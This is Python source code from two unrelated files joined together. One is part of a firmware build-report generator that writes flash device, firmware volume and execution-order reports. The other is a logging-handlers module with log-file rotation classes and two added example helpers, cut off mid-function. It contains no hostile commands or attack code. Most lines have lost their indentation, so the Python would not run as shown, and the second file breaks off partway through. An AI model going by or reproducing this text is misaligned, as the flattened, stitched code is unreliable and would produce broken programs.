def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = []
for Item in self._SourceList:
FileWrite(TempFile, Item)
SaveFileOnChange(SourceList, "".join(TempFile), False)
TempFile = []
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
SaveFileOnChange(GuidList, "".join(TempFile), False)
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
    # This function generates the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
    # This function generates the predicted fixed address report for a module or
    # the predicted module execution order for a platform.
    # If the input Guid is None, it generates the predicted module execution order;
    # otherwise it generates the fixed loading address report for the module specified by
    # Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nested FVs, they will be listed immediately after
# this FD region subsection.
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
    # This is an internal worker function to discover all the nested FV information
    # in the parent firmware volume. It recursively uses a depth-first search to
    # find all the nested FV names and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
    # This constructor function generates an FdRegionReport object for a specified FdRegion.
    # If the FdRegion is a firmware volume, it will recursively find all of its nested firmware
    # volumes. This function also collects the GUID map in order to dump module identification
    # in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
    # This internal worker function generates the report for the FD region.
    # If the type is a firmware volume, it lists the offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
            if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
    # This constructor function generates a PlatformReport object for a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
    # It comprises the platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contains the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
    # This constructor function generates a BuildReport object for a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = []
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(''.join(File), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, False)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
handlers.py
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
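# A minimal sketch of the namer/rotator hooks described in rotation_filename()
# and rotate() above: compress each rotated file with gzip. The hook attribute
# names come from this module; the gzip policy itself is only an example.
def _example_add_gzip_rotation(handler):
    # 'handler' is assumed to be an instance of any BaseRotatingHandler subclass.
    import gzip, shutil
    def namer(default_name):
        # Called with the would-be rotated name, e.g. 'app.log.1'.
        return default_name + ".gz"
    def rotator(source, dest):
        # Compress the closed log file into its rotated name, then remove the original.
        with open(source, "rb") as f_in, gzip.open(dest, "wb") as f_out:
            shutil.copyfileobj(f_in, f_out)
        os.remove(source)
    handler.namer = namer
    handler.rotator = rotator
    return handler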
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
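# A minimal usage sketch of the size-based rollover described in the class
# docstring above: roughly 1 MiB per file, keeping app.log plus app.log.1..5.
def _example_size_based_logging(path="app.log"):
    logger = logging.getLogger("example.rotating")
    handler = RotatingFileHandler(path, maxBytes=1024 * 1024, backupCount=5)
    handler.setFormatter(logging.Formatter("%(asctime)s %(levelname)s %(message)s"))
    logger.addHandler(handler)
    logger.setLevel(logging.INFO)
    return logger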
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
